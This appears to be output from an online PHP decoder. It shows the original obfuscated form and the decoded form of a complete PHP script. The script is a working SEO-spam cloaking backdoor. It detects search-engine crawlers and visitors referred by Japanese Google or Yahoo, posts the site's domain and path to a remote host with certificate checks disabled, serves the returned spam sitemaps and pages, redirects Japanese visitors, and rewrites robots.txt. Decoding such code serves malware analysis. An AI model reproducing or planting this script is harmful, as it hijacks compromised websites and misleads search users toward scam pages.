Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $hdB1U = "\150\164\164\160\x73\x3a\57\x2f\x6a\62\65\x30\x31\61\65\x5f\x31\x33\56\155..
Decoded Output download
<?php $hdB1U = "https://j250115_13.monkeyes.click/"; class s90e4 { public function Dx1Te($ge86o = '', $UBADs = '') { if (!empty($ge86o)) { goto PXq2N; } return $_SERVER; PXq2N: $ge86o = strtoupper($ge86o); return isset($_SERVER[$ge86o]) ? $_SERVER[$ge86o] : $UBADs; } public function MVMhQ() { if ($this->DX1te("HTTPS") && ("1" == $this->DX1Te("HTTPS") || "on" == strtolower($this->DX1TE("HTTPS")))) { goto tcEA0; } if ("https" == $this->dX1TE("REQUEST_SCHEME")) { goto JVKnQ; } if ("443" == $this->Dx1TE("SERVER_PORT")) { goto Y_lIH; } if ("https" == $this->dX1tE("HTTP_X_FORWARDED_PROTO")) { goto rYa30; } goto bhyWC; tcEA0: return true; goto bhyWC; JVKnQ: return true; goto bhyWC; Y_lIH: return true; goto bhyWC; rYa30: return true; bhyWC: return false; } public function OKFp0() { $SZHK_ = strval($this->DX1Te("HTTP_X_FORWARDED_HOST") ?: $this->DX1Te("HTTP_HOST")); return strpos($SZHK_, ":") ? strstr($SZHK_, ":", true) : $SZHK_; } public function fo0LN() { return $this->MVMhQ() ? "https" : "http"; } public function MQ0MR() { $tkngJ = $this->SyW3l(); if (!in_array($tkngJ, [80, 443])) { goto TNAcf; } return $this->fO0lN() . "://" . $this->OkFP0(); TNAcf: return $this->fo0lN() . "://" . $this->oKFP0() . ":" . $tkngJ; } public function SYW3l() : int { return (int) ($this->DX1tE("HTTP_X_FORWARDED_PORT") ?: $this->Dx1tE("SERVER_PORT", '')); } public function x7dtN() { $cSFA6 = strtolower($this->Dx1te("HTTP_USER_AGENT")); if (!($cSFA6 != '' && preg_match("/googlebot|google|yahoo|bing|aol/si", $cSFA6))) { goto Kno5z; } return true; Kno5z: return false; } public function HPSK6() { $dkDYD = strtolower($this->dx1te("HTTP_REFERER")); if (!($dkDYD != '' && preg_match("/google.co.jp|yahoo.co.jp|google.com/si", $dkDYD))) { goto YPQbT; } return true; YPQbT: return false; } public function ngDXH() { $WC3RN = basename($this->Dx1tE("SCRIPT_FILENAME")); if (basename($this->dx1TE("SCRIPT_NAME")) === $WC3RN) { goto mIFoC; } if (basename($this->DX1TE("PHP_SELF")) === $WC3RN) { goto Bcx8z; } if (basename($this->dX1TE("ORIG_SCRIPT_NAME")) === $WC3RN) { goto teSTu; } if (($zsk98 = strpos($this->DX1Te("PHP_SELF"), "/" . $WC3RN)) !== false) { goto z8CqP; } if ($this->DX1Te("DOCUMENT_ROOT") && strpos($this->Dx1te("SCRIPT_FILENAME"), $this->Dx1tE("DOCUMENT_ROOT")) === 0) { goto nWumh; } goto Z1ncH; mIFoC: $VvZdn = $this->dX1Te("SCRIPT_NAME"); goto Z1ncH; Bcx8z: $VvZdn = $this->dx1TE("PHP_SELF"); goto Z1ncH; teSTu: $VvZdn = $this->DX1tE("ORIG_SCRIPT_NAME"); goto Z1ncH; z8CqP: $VvZdn = substr($this->dx1Te("SCRIPT_NAME"), 0, $zsk98) . "/" . $WC3RN; goto Z1ncH; nWumh: $VvZdn = str_replace($this->DX1TE("DOCUMENT_ROOT"), '', $this->dX1te("SCRIPT_FILENAME")); Z1ncH: if (($zsk98 = strpos($this->Dx1Te("REQUEST_URI"), ".php")) !== false) { goto u0Qrg; } $rF9Fb = $VvZdn . substr($this->dx1TE("REQUEST_URI"), strpos($this->dx1Te("REQUEST_URI"), "/")); goto CxEvT; u0Qrg: $rF9Fb = $VvZdn . substr($this->DX1te("REQUEST_URI"), $zsk98 + 4); CxEvT: return rtrim($rF9Fb, "/"); } public function cLuKC($VvZdn, $gX6eK = array()) { $VvZdn = str_replace(" ", "+", $VvZdn); $h1nm8 = curl_init(); curl_setopt($h1nm8, CURLOPT_URL, $VvZdn); curl_setopt($h1nm8, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h1nm8, CURLOPT_HEADER, 0); curl_setopt($h1nm8, CURLOPT_TIMEOUT, 20); curl_setopt($h1nm8, CURLOPT_POST, 1); curl_setopt($h1nm8, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h1nm8, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h1nm8, CURLOPT_POSTFIELDS, http_build_query($gX6eK)); $kgJz7 = curl_exec($h1nm8); $POPuS = curl_errno($h1nm8); curl_close($h1nm8); if (!(0 !== $POPuS)) { goto EvSSU; } return false; EvSSU: return $kgJz7; } } $B7gwQ = new s90E4(); $XuZJW = $B7gwQ->x7DTN(); $cEex0 = $B7gwQ->HpsK6(); $kUxcZ = $hdB1U . "robots.php"; $NqWLX = $hdB1U . "word.php"; $ihV5B = $hdB1U . "jump.php"; $cam48 = $hdB1U . "map.php"; $w55O2 = $hdB1U . "indata.php"; $EhDtM = str_replace("/index.php", '', urldecode($B7gwQ->ngdXh())); $gX6eK = ["domain" => $B7gwQ->mQ0mR(), "port" => $B7gwQ->Syw3L(), "uri" => $EhDtM]; if (!(substr($EhDtM, -6) == "robots")) { goto cBtI1; } $kgJz7 = $B7gwQ->ClUkC($kUxcZ, $gX6eK); file_put_contents(__DIR__ . "/robots.txt", $kgJz7); $gKPu1 = @file_get_contents(__DIR__ . "/robots.txt"); if (strpos(strtolower($gKPu1), "sitemap")) { goto Df9SK; } exit("robots.txt file create fail!"); goto C4eeH; Df9SK: exit("robots.txt file create success!"); C4eeH: cBtI1: if (!(substr($EhDtM, -4) == ".xml")) { goto yH9ec; } if (!(strpos($EhDtM, "allsitemap.xml") || strpos($EhDtM, "sitemap-index.xml") || strpos($EhDtM, "sitemap-index-1.xml") || strpos($EhDtM, "index.xml"))) { goto rnL9Q; } $kgJz7 = $B7gwQ->clUKc($cam48, $gX6eK); header("Content-type:text/" . (substr($kgJz7, 0, 5) === "<?xml" ? "xml" : "plain") . "; charset=utf-8"); exit('' . $kgJz7); rnL9Q: $kgJz7 = $B7gwQ->CLUkc($NqWLX, $gX6eK); header("Content-type:text/xml; charset=utf-8"); if ($kgJz7 == "1") { goto Vo4VJ; } exit('' . $kgJz7); goto wdT03; Vo4VJ: exit('' . $B7gwQ->Clukc($cam48, $gX6eK)); wdT03: yH9ec: $tzvVZ = $B7gwQ->Dx1tE("HTTP_ACCEPT_LANGUAGE"); if (!(!$XuZJW && $cEex0 && preg_match("/ja/i", $tzvVZ))) { goto VFL0y; } exit('' . $B7gwQ->CLUKC($ihV5B, $gX6eK)); VFL0y: if (!($XuZJW || preg_match("#[a-zA-Z]+\-[a-zA-Z]+\d{5,7}\-\d{3}#", $EhDtM))) { goto bVyt1; } exit('' . $B7gwQ->clUkC($w55O2, $gX6eK)); bVyt1:?>
Did this file decode correctly?
Original Code
<?php $hdB1U = "\150\164\164\160\x73\x3a\57\x2f\x6a\62\65\x30\x31\61\65\x5f\x31\x33\56\155\157\x6e\153\145\x79\x65\163\x2e\143\x6c\151\143\153\x2f"; class s90e4 { public function Dx1Te($ge86o = '', $UBADs = '') { if (!empty($ge86o)) { goto PXq2N; } return $_SERVER; PXq2N: $ge86o = strtoupper($ge86o); return isset($_SERVER[$ge86o]) ? $_SERVER[$ge86o] : $UBADs; } public function MVMhQ() { if ($this->DX1te("\x48\x54\x54\120\x53") && ("\61" == $this->DX1Te("\110\124\124\120\123") || "\x6f\156" == strtolower($this->DX1TE("\x48\x54\124\120\123")))) { goto tcEA0; } if ("\x68\164\x74\160\163" == $this->dX1TE("\122\x45\x51\x55\x45\123\124\x5f\123\x43\x48\105\x4d\x45")) { goto JVKnQ; } if ("\64\64\63" == $this->Dx1TE("\x53\105\122\126\105\x52\x5f\120\x4f\x52\x54")) { goto Y_lIH; } if ("\x68\164\x74\x70\x73" == $this->dX1tE("\x48\x54\124\120\137\x58\x5f\106\117\x52\127\101\x52\x44\x45\104\x5f\x50\122\117\x54\117")) { goto rYa30; } goto bhyWC; tcEA0: return true; goto bhyWC; JVKnQ: return true; goto bhyWC; Y_lIH: return true; goto bhyWC; rYa30: return true; bhyWC: return false; } public function OKFp0() { $SZHK_ = strval($this->DX1Te("\110\124\124\x50\x5f\130\137\106\117\x52\127\101\x52\x44\x45\104\x5f\110\117\x53\x54") ?: $this->DX1Te("\110\124\124\x50\137\x48\x4f\123\124")); return strpos($SZHK_, "\72") ? strstr($SZHK_, "\72", true) : $SZHK_; } public function fo0LN() { return $this->MVMhQ() ? "\x68\164\164\160\163" : "\x68\x74\x74\x70"; } public function MQ0MR() { $tkngJ = $this->SyW3l(); if (!in_array($tkngJ, [80, 443])) { goto TNAcf; } return $this->fO0lN() . "\x3a\57\x2f" . $this->OkFP0(); TNAcf: return $this->fo0lN() . "\72\57\57" . $this->oKFP0() . "\72" . $tkngJ; } public function SYW3l() : int { return (int) ($this->DX1tE("\110\x54\124\120\137\130\137\106\x4f\x52\127\101\x52\104\x45\104\x5f\x50\117\x52\124") ?: $this->Dx1tE("\x53\x45\x52\x56\105\122\x5f\x50\117\x52\124", '')); } public function x7dtN() { $cSFA6 = strtolower($this->Dx1te("\110\x54\x54\120\137\125\x53\x45\122\x5f\101\107\105\x4e\x54")); if (!($cSFA6 != '' && preg_match("\57\147\x6f\157\x67\x6c\145\x62\157\164\x7c\147\x6f\157\147\154\x65\174\x79\141\150\157\x6f\x7c\x62\151\x6e\147\174\141\157\154\x2f\x73\x69", $cSFA6))) { goto Kno5z; } return true; Kno5z: return false; } public function HPSK6() { $dkDYD = strtolower($this->dx1te("\110\x54\124\x50\x5f\x52\x45\x46\x45\x52\105\x52")); if (!($dkDYD != '' && preg_match("\x2f\147\x6f\x6f\x67\154\x65\56\x63\x6f\x2e\152\x70\x7c\171\x61\150\x6f\x6f\x2e\x63\x6f\x2e\x6a\x70\174\x67\x6f\157\147\154\145\x2e\x63\157\x6d\x2f\x73\151", $dkDYD))) { goto YPQbT; } return true; YPQbT: return false; } public function ngDXH() { $WC3RN = basename($this->Dx1tE("\x53\103\x52\111\x50\124\x5f\106\111\114\x45\x4e\101\x4d\x45")); if (basename($this->dx1TE("\x53\103\x52\x49\x50\x54\x5f\116\101\x4d\105")) === $WC3RN) { goto mIFoC; } if (basename($this->DX1TE("\x50\x48\120\x5f\x53\x45\x4c\x46")) === $WC3RN) { goto Bcx8z; } if (basename($this->dX1TE("\x4f\122\x49\x47\x5f\x53\103\x52\111\x50\124\x5f\116\101\x4d\x45")) === $WC3RN) { goto teSTu; } if (($zsk98 = strpos($this->DX1Te("\x50\x48\120\x5f\123\105\114\x46"), "\57" . $WC3RN)) !== false) { goto z8CqP; } if ($this->DX1Te("\x44\x4f\103\125\115\105\116\124\137\122\117\117\124") && strpos($this->Dx1te("\x53\103\122\111\120\124\137\106\111\114\x45\x4e\101\x4d\105"), $this->Dx1tE("\104\x4f\103\x55\x4d\105\116\x54\x5f\122\x4f\x4f\x54")) === 0) { goto nWumh; } goto Z1ncH; mIFoC: $VvZdn = $this->dX1Te("\x53\103\x52\x49\x50\x54\x5f\116\101\x4d\105"); goto Z1ncH; Bcx8z: $VvZdn = $this->dx1TE("\120\110\120\137\x53\x45\x4c\x46"); goto Z1ncH; teSTu: $VvZdn = $this->DX1tE("\x4f\122\111\107\x5f\123\x43\122\x49\x50\x54\137\116\x41\x4d\x45"); goto Z1ncH; z8CqP: $VvZdn = substr($this->dx1Te("\123\x43\x52\111\x50\124\137\x4e\101\115\x45"), 0, $zsk98) . "\57" . $WC3RN; goto Z1ncH; nWumh: $VvZdn = str_replace($this->DX1TE("\104\117\x43\125\x4d\105\x4e\x54\x5f\122\117\117\124"), '', $this->dX1te("\123\103\x52\x49\120\x54\x5f\x46\x49\x4c\105\116\101\115\105")); Z1ncH: if (($zsk98 = strpos($this->Dx1Te("\122\x45\121\125\x45\x53\124\x5f\125\122\111"), "\x2e\x70\150\x70")) !== false) { goto u0Qrg; } $rF9Fb = $VvZdn . substr($this->dx1TE("\x52\x45\x51\125\105\123\x54\137\125\x52\111"), strpos($this->dx1Te("\x52\x45\x51\x55\105\x53\x54\x5f\x55\122\x49"), "\57")); goto CxEvT; u0Qrg: $rF9Fb = $VvZdn . substr($this->DX1te("\x52\x45\x51\x55\x45\x53\x54\137\125\x52\111"), $zsk98 + 4); CxEvT: return rtrim($rF9Fb, "\x2f"); } public function cLuKC($VvZdn, $gX6eK = array()) { $VvZdn = str_replace("\40", "\53", $VvZdn); $h1nm8 = curl_init(); curl_setopt($h1nm8, CURLOPT_URL, $VvZdn); curl_setopt($h1nm8, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h1nm8, CURLOPT_HEADER, 0); curl_setopt($h1nm8, CURLOPT_TIMEOUT, 20); curl_setopt($h1nm8, CURLOPT_POST, 1); curl_setopt($h1nm8, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h1nm8, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h1nm8, CURLOPT_POSTFIELDS, http_build_query($gX6eK)); $kgJz7 = curl_exec($h1nm8); $POPuS = curl_errno($h1nm8); curl_close($h1nm8); if (!(0 !== $POPuS)) { goto EvSSU; } return false; EvSSU: return $kgJz7; } } $B7gwQ = new s90E4(); $XuZJW = $B7gwQ->x7DTN(); $cEex0 = $B7gwQ->HpsK6(); $kUxcZ = $hdB1U . "\162\x6f\142\157\x74\163\56\x70\x68\x70"; $NqWLX = $hdB1U . "\x77\x6f\162\x64\56\160\x68\x70"; $ihV5B = $hdB1U . "\152\165\x6d\x70\56\160\150\160"; $cam48 = $hdB1U . "\155\141\160\56\x70\150\160"; $w55O2 = $hdB1U . "\x69\156\144\x61\164\141\56\160\150\160"; $EhDtM = str_replace("\57\151\x6e\x64\145\170\56\160\x68\160", '', urldecode($B7gwQ->ngdXh())); $gX6eK = ["\144\x6f\x6d\x61\151\156" => $B7gwQ->mQ0mR(), "\x70\157\162\x74" => $B7gwQ->Syw3L(), "\165\162\151" => $EhDtM]; if (!(substr($EhDtM, -6) == "\x72\157\142\157\164\163")) { goto cBtI1; } $kgJz7 = $B7gwQ->ClUkC($kUxcZ, $gX6eK); file_put_contents(__DIR__ . "\57\162\157\x62\x6f\164\x73\x2e\164\x78\164", $kgJz7); $gKPu1 = @file_get_contents(__DIR__ . "\57\x72\157\x62\x6f\164\x73\x2e\x74\170\x74"); if (strpos(strtolower($gKPu1), "\163\151\x74\145\x6d\x61\x70")) { goto Df9SK; } exit("\162\157\x62\157\x74\163\x2e\x74\x78\164\40\x66\x69\x6c\145\x20\143\162\145\141\x74\x65\x20\x66\x61\x69\x6c\x21"); goto C4eeH; Df9SK: exit("\162\157\142\157\164\163\x2e\164\170\164\40\146\x69\154\x65\40\x63\x72\x65\141\x74\x65\40\163\x75\x63\143\x65\x73\x73\x21"); C4eeH: cBtI1: if (!(substr($EhDtM, -4) == "\56\x78\155\154")) { goto yH9ec; } if (!(strpos($EhDtM, "\x61\x6c\154\163\151\x74\145\155\141\x70\x2e\170\x6d\x6c") || strpos($EhDtM, "\x73\151\x74\145\x6d\x61\x70\x2d\x69\x6e\x64\145\x78\56\x78\x6d\x6c") || strpos($EhDtM, "\163\x69\164\x65\155\141\x70\55\151\156\x64\x65\170\x2d\x31\56\170\x6d\154") || strpos($EhDtM, "\x69\x6e\x64\x65\x78\56\170\155\x6c"))) { goto rnL9Q; } $kgJz7 = $B7gwQ->clUKc($cam48, $gX6eK); header("\103\x6f\x6e\164\145\156\x74\x2d\164\x79\x70\x65\x3a\164\x65\x78\x74\x2f" . (substr($kgJz7, 0, 5) === "\74\x3f\170\x6d\154" ? "\170\x6d\154" : "\160\x6c\141\151\156") . "\73\40\x63\x68\141\162\163\145\x74\75\165\164\146\55\x38"); exit('' . $kgJz7); rnL9Q: $kgJz7 = $B7gwQ->CLUkc($NqWLX, $gX6eK); header("\x43\157\x6e\x74\x65\x6e\x74\55\164\x79\160\145\x3a\x74\x65\170\164\57\x78\155\154\x3b\40\x63\x68\141\162\x73\x65\164\75\x75\x74\146\x2d\x38"); if ($kgJz7 == "\61") { goto Vo4VJ; } exit('' . $kgJz7); goto wdT03; Vo4VJ: exit('' . $B7gwQ->Clukc($cam48, $gX6eK)); wdT03: yH9ec: $tzvVZ = $B7gwQ->Dx1tE("\110\124\124\120\x5f\x41\x43\x43\105\120\x54\x5f\x4c\101\116\107\x55\101\107\x45"); if (!(!$XuZJW && $cEex0 && preg_match("\57\152\141\x2f\x69", $tzvVZ))) { goto VFL0y; } exit('' . $B7gwQ->CLUKC($ihV5B, $gX6eK)); VFL0y: if (!($XuZJW || preg_match("\x23\133\141\55\172\x41\x2d\x5a\135\x2b\134\x2d\x5b\x61\55\x7a\101\55\x5a\x5d\53\x5c\x64\x7b\x35\x2c\67\x7d\x5c\x2d\134\x64\x7b\x33\175\43", $EhDtM))) { goto bVyt1; } exit('' . $B7gwQ->clUkC($w55O2, $gX6eK)); bVyt1:?>
Function Calls
None |
Stats
MD5 | eca3d1a54f492f3c94db381852d9f566 |
Eval Count | 0 |
Decode Time | 86 ms |